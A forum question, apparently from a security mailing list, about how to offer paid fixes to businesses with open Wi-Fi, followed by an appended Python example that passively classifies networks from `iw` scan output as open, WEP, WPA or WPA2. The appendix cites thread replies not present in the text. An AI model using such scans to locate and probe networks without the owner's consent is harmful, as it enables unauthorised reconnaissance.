My question is, then, how to approach someone to legally get work from them fixing their badly installed wi-fi and ensuring it is all locked down. If I turn up saying "Your wireless networking is open to hacking and I can fix it", that sounds somewhat suspicious to me if you look at it from the point of view of a user who knows nothing much about it all. E.g., I am telling them something they don't want to hear, for a start, and then telling them that if they pay me, they can have it fixed on the spot. I already know how strange it can sound. I happened to pick up the SSID "ToysRus" which was open and, realising they would have their own company-employed I.T. people, I just rang them to do them a favour and wasn't I met with suspicion? Yep! All I did was say "You know you have wireless networking?" and they answered yes and I added "It's open and unsecured. You better fix it before someone else finds it" and then got asked 100 questions including "How do YOU know?" blah blah by someone you would think KNOWS the game.

How do YOU approach prospective new customers to tell them their wi-fi is unsecured and needs attention and that you can fix it for a fee? Any help appreciated.

Greg.
The reason why you have people breaking into your software is because your software sucks.
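The thread above turns on a narrow kind of scan: Greg describes collecting only "SSID data showing open and closed and nothing else", and Wade suggests showing the prospect a kismet/netstumbler scan. The following is an added example, not code from anyone in the thread, of exactly that passive classification. It parses the text output format of the Linux `iw dev <ifname> scan` command (the per-BSS blocks with `capability:`, `SSID:`, `RSN:` and `WPA:` lines) and reports, per network, only the BSSID, SSID and a security label. It never transmits; the classification comes from what the card already heard in beacons and probe responses: no `Privacy` capability bit means open, `Privacy` with no RSN/WPA information element means WEP, a `WPA:` block means WPA1, an `RSN:` block means WPA2/802.11i. The scan text, the SSIDs and the BSSIDs are constructed for the example.

```python
"""Passive open-vs-encrypted classification of `iw dev wlan0 scan` output.

Added example (not from the Full-Disclosure thread). It only reads scan
text; collect it with `iw dev wlan0 scan > scan.txt` on an interface you
are allowed to scan from, then run this file with the path as argv[1].
"""
import re
import sys
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in `iw` scan format (real iw indents with tabs; the
# parser strips either). SSIDs/BSSIDs are made up for the example.
SAMPLE_SCAN = """\
BSS 00:11:22:33:44:55(on wlan0)
    freq: 2437
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -45.00 dBm
    SSID: CorpNet
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
BSS 66:77:88:99:aa:bb(on wlan0)
    freq: 2412
    capability: ESS ShortSlotTime (0x0401)
    signal: -60.00 dBm
    SSID: ToysRus
BSS cc:dd:ee:ff:00:11(on wlan0)
    freq: 2462
    capability: ESS Privacy (0x0011)
    signal: -70.00 dBm
    SSID: legacy-ap
BSS 22:33:44:55:66:77(on wlan0)
    freq: 5180
    capability: ESS Privacy (0x0011)
    signal: -52.00 dBm
    SSID:
    WPA:     * Version: 1
         * Group cipher: TKIP
         * Pairwise ciphers: TKIP
         * Authentication suites: PSK
"""


@dataclass
class Network:
    bssid: str
    ssid: str
    security: str  # OPEN, WEP, WPA, WPA2 or WPA/WPA2


def _label(privacy: bool, rsn: bool, wpa: bool) -> str:
    """Map advertised capability bit + information elements to a label.

    The Privacy bit alone (no RSN/WPA IE) is WEP; an RSN IE is 802.11i
    (WPA2); the vendor WPA IE is WPA1; mixed-mode APs advertise both.
    """
    if rsn and wpa:
        return "WPA/WPA2"
    if rsn:
        return "WPA2"
    if wpa:
        return "WPA"
    if privacy:
        return "WEP"
    return "OPEN"


_BSS_RE = re.compile(r"^BSS ((?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})")


def parse_iw_scan(text: str) -> List[Network]:
    """Parse `iw dev <if> scan` text into one Network per BSS block."""
    networks: List[Network] = []
    cur: Optional[dict] = None

    def flush() -> None:
        if cur is not None:
            networks.append(Network(cur["bssid"], cur["ssid"] or "<hidden>",
                                    _label(cur["privacy"], cur["rsn"], cur["wpa"])))

    for raw in text.splitlines():
        m = _BSS_RE.match(raw)
        if m:  # a new "BSS <mac>(on ifname)" header starts a block
            flush()
            cur = {"bssid": m.group(1).lower(), "ssid": "",
                   "privacy": False, "rsn": False, "wpa": False}
            continue
        if cur is None:
            continue
        line = raw.strip()
        if line.startswith("capability:"):
            cur["privacy"] = "Privacy" in line.split()
        elif line.startswith("SSID:"):
            cur["ssid"] = line[len("SSID:"):].strip()
        elif line.startswith("RSN:"):
            cur["rsn"] = True
        elif line.startswith("WPA:"):
            cur["wpa"] = True
    flush()
    return networks


def open_networks(text: str) -> List[Network]:
    """Just the networks that advertise no encryption at all."""
    return [n for n in parse_iw_scan(text) if n.security == "OPEN"]


if __name__ == "__main__":
    scan_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SCAN
    for n in parse_iw_scan(scan_text):
        print(f"{n.bssid}  {n.security:<9} {n.ssid}")
```

On the constructed sample this reports CorpNet as WPA2, ToysRus as OPEN, legacy-ap as WEP and the hidden-SSID network as WPA. Two caveats a practitioner should keep in mind: the label reflects only what the access point advertises, so a WPA3 (SAE) network also shows an `RSN:` block and would need the authentication suite inspected to be told apart from WPA2; and, as the first reply in the thread points out, even this listen-only step is something the network's owner may object to, so the scan interface and the scope should be agreed before the output is shown to anyone.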